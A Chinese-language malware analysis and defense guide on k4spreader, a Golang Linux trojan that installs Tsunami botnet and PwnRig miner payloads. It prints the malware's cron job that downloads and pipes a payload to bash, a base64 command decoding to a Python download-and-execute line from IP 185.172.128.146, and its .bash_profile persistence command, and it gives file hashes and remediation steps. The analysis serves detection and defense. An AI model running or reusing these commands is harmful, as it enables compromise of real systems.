k4spreader木马详细分析--国内大量企业和单位被感染
字数 1801 2025-08-24 20:49:22
k4spreader木马详细分析及防御指南
概述
k4spreader是一种针对Linux系统的恶意木马程序,近期在国内大量企业和单位中被发现感染。该木马由Golang语言编写,主要功能包括自我复制、持久化驻留、横向传播以及下载执行其他恶意载荷(如Tsunami僵尸网络和PwnRig挖矿病毒)。
样本版本分析
v1版本样本
技术特征
- 加壳方式:使用UPX加壳,可通过
upx -d命令脱壳 - 编程语言:Golang编写,函数名包含"k4spreader"字符串
- 单实例运行:通过文件锁机制确保系统中只运行一个实例
- 创建隐藏文件:
/tmp/.klibsystem4.lock - 文件中存放当前进程PID信息
- 使用
syscall指令触发系统调用
- 创建隐藏文件:
持久化技术
-
自我复制机制:
- 根据用户权限采取不同策略:
- root用户:
- 调用
k4spreader_utils_SetupAndStartKnlibService - 调用
k4spreader_utils_CreateSystemService
- 调用
- 非root用户:
- 调用
k4spreader_utils_AddLineToBashProfile
- 调用
- root用户:
- 修改
.bash_profile文件,添加内容:cp -f -r -- /bin/klibsystem4 2>/dev/null && /bin/klibsystem4 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem4 2>/dev/null
- 根据用户权限采取不同策略:
-
系统服务创建:
- 创建
/etc/init.d/knlib文件 - 创建
/etc/systemd/system/knlibe.service文件 - 复制自身到
/bin/knlib路径
- 创建
恶意功能
-
计划任务创建:
- 每10分钟执行一次外联下载:
*/10 * * * * (curl -s %s/2.gif || wget -q -O - %s/2.gif || lwp-download %s/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d| bash - Base64解码后内容:
python -c 'import urllib;exec(urllib.urlopen("http://185.172.128.146:443/d.py").read())' || python2 -c 'import urllib;exec(urllib.urlopen("http://185.172.128.146/d.py").read())'
- 每10分钟执行一次外联下载:
-
恶意载荷释放:
- 从自身释放
bi.64和bin.64文件 - 释放的文件包括:
- Tsunami僵尸网络
- PwnRig挖矿病毒
- 运行后删除释放的文件
- 从自身释放
-
外联下载:
- 若释放文件失败,则外联下载恶意程序
v2版本样本
- 加壳方式:同样使用UPX加壳
- 新增功能:执行关闭防火墙等操作
v3版本样本
- 双层加壳:
- 第一层:UPX加壳
- 脱壳后释放文件(位于
/tmp/目录) - 释放的文件再次使用UPX加壳
- 最终payload:脱壳后为k4spreader v3版本
相关IOC(入侵指标)
| 哈希值 | 版本 |
|---|---|
| 7bade55726a3a6e86d809836d1bc43f4f7702ecde9ceed80a09876c2efeff8d4 | v1 |
| f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712 | v2 |
| 0897b1d3e3e453c160bf8d28a041eee3bd29e43a6f063faed7d3cb83a86b88cc | v2 |
| a980b1b0387534da7c9a321f7d450c02087f7a8445fc86b77785da0c510bbaa8 | v2 |
| 31fd924b9a5747befdf61c03b02c90d3c2ba93c8e1a9f798e6dfefe23767e1ae | v3 |
| 20d08d27631ae9bab8f3cb7cddd9b35fb75e5bee5764072f77ac3b4513307838 | v3 |
防御建议
-
系统检查:
- 检查
/tmp/.klibsystem4.lock文件是否存在 - 检查
/bin/klibsystem4或/bin/knlib文件 - 检查
/etc/init.d/knlib和/etc/systemd/system/knlibe.service服务文件 - 检查异常的计划任务
- 检查
-
网络监控:
- 监控与185.172.128.146的通信
- 拦截对
2.gif和d.py的下载请求
-
防护措施:
- 及时更新系统和安全补丁
- 限制非必要的外联访问
- 使用EDR/XDR解决方案进行端点防护
- 定期审计系统日志和文件完整性
-
应急响应:
- 发现感染后立即隔离受影响系统
- 彻底清除所有相关文件和注册项
- 重置所有可能泄露的凭据
- 进行全面的系统安全检查
-
用户教育:
- 提高员工安全意识
- 避免使用弱密码
- 谨慎处理不明来源的文件和链接
通过以上分析和防御建议,组织可以有效识别和防范k4spreader木马的威胁,保护系统安全。